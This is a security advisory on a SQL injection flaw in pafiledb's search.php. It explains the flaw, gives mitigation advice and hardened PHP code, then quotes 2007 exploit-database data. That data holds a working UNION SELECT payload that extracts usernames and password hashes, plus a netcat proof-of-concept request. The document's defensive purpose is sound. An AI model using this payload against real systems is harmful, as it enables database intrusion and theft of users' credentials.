Vendor: pafiledb
By: h4si & pUm
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: pafiledb
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

SQL Injection in includes/search.php

The vulnerability is in the includes/search.php file of pafiledb (PHP Arena). The query quoted below in the Exploit-DB data is susceptible to SQL injection: the elements of the user-supplied $_POST['categories'] array are imploded straight into the IN (...) clause of the SQL statement without any validation or escaping. An attacker can use this to execute arbitrary SQL and read sensitive data from the database, such as user names and password hashes from the users table.

Mitigation:

To mitigate this vulnerability, the developer should use prepared statements with bound parameters so that user input is passed to the database as data rather than being concatenated into the SQL text; because the input is an array used in an IN (...) list, one placeholder per element is needed, and the category ids should additionally be validated as integers. The search_in[] values select column names, which cannot be bound as parameters and must therefore be checked against a fixed allow-list. Input validation and output encoding should also be applied to prevent cross-site scripting (XSS).
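The following is an added example, not code from pafiledb or PHP Arena, showing the vulnerable pattern from the quoted query beside a hardened version of the same search. It assumes a PDO connection in $pdo, a configured (non-user-controlled) table prefix in $dbPrefix, and the column names that appear in the advisory's query and POC.

```php
<?php
// Added example, not pafiledb's own code. Assumes a PDO connection ($pdo), the
// configured table prefix $dbPrefix and the column names quoted in the advisory.

// The vulnerable pattern: categories[] is imploded straight into the IN (...) list,
// so any element may close the parenthesis and append further SQL.
function buildVulnerableQuery(string $dbPrefix, string $searchin, array $categories): string
{
    return "SELECT * FROM " . $dbPrefix . "files WHERE (" . $searchin
        . ") AND file_catid IN (" . implode(',', $categories) . ")";
}

// Hardened version: search columns come from a fixed allow-list (identifiers cannot be
// bound as parameters), category ids must validate as positive integers, and every
// value reaches the database through a placeholder. A value such as
// "1) UNION SELECT ..." in categories[] is rejected before any SQL is built.
function searchFiles(PDO $pdo, string $dbPrefix, array $searchIn, array $categories, string $query): array
{
    $allowedColumns = ['file_name', 'file_desc', 'file_longdesc', 'file_creator', 'file_version'];

    // Keep only the requested columns that are on the allow-list.
    $columns = array_values(array_intersect($allowedColumns, $searchIn));
    if ($columns === []) {
        throw new InvalidArgumentException('no valid search column selected');
    }

    $ids = [];
    foreach ($categories as $value) {
        // FILTER_VALIDATE_INT returns false for anything that is not a plain integer.
        $id = filter_var($value, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
        if ($id === false) {
            throw new InvalidArgumentException('invalid category id');
        }
        $ids[] = $id;
    }
    if ($ids === []) {
        throw new InvalidArgumentException('no category selected');
    }

    // One "col LIKE ?" clause per allowed column, one "?" per validated category id.
    $searchSql = implode(' OR ', array_map(fn ($c) => "$c LIKE ?", $columns));
    $inSql     = implode(',', array_fill(0, count($ids), '?'));
    $sql       = "SELECT * FROM {$dbPrefix}files WHERE ($searchSql) AND file_catid IN ($inSql)";

    // Bind the search term once per column, then the category ids in order.
    $params = array_merge(array_fill(0, count($columns), '%' . $query . '%'), $ids);

    $stmt = $pdo->prepare($sql);
    $stmt->execute($params);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Usage (hypothetical credentials; emulated prepares disabled so the server parses the
// statement and its parameters separately):
// $pdo = new PDO('mysql:host=localhost;dbname=pafiledb', $user, $pass,
//     [PDO::ATTR_EMULATE_PREPARES => false, PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
// searchFiles($pdo, 'pafiledb_', ['file_name'], ['1) UNION SELECT ...'], 'test'); // throws
// searchFiles($pdo, 'pafiledb_', ['file_name', 'file_desc'], ['1', '3'], 'test');  // runs
```

The integer check alone would already stop the injection quoted in this advisory, but binding the validated ids as parameters means the fix does not depend on remembering to validate every future call site; the allow-list for columns is required regardless, since an identifier spliced from search_in[] is the same class of bug.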

Exploit-DB raw data:

Site: http://www.phparena.net/pafiledb
Description: SQL injection (categories) in includes/search.php
Code: $results = $db->GetArray("SELECT * FROM ".$dbPrefix."files WHERE (".$searchin.") AND file_catid IN (".implode(',',$_POST['categories']).")");

Comment: "ouuch"

SQL: ) UNION SELECT ALL null,user_username,user_password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null FROM (pafiledb_users

POC:
host="www.example.com"; echo -e "POST http://$host/index.php?act=search&process HTTP/1.1\nHost: $host\nContent-Length: 302\n\nquery=test&search_in[]=file_name&search_in[]=file_desc&search_in[]=file_longdesc&search_in[]=file_creator&search_in[]=file_version&categories[]=1) UNION SELECT ALL null,user_username,user_password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null FROM (pafiledb_users" | netcat $host 80

Vendor: was informed, but has not responded yet...
credits: h4si & pUm

# milw0rm.com [2007-07-14]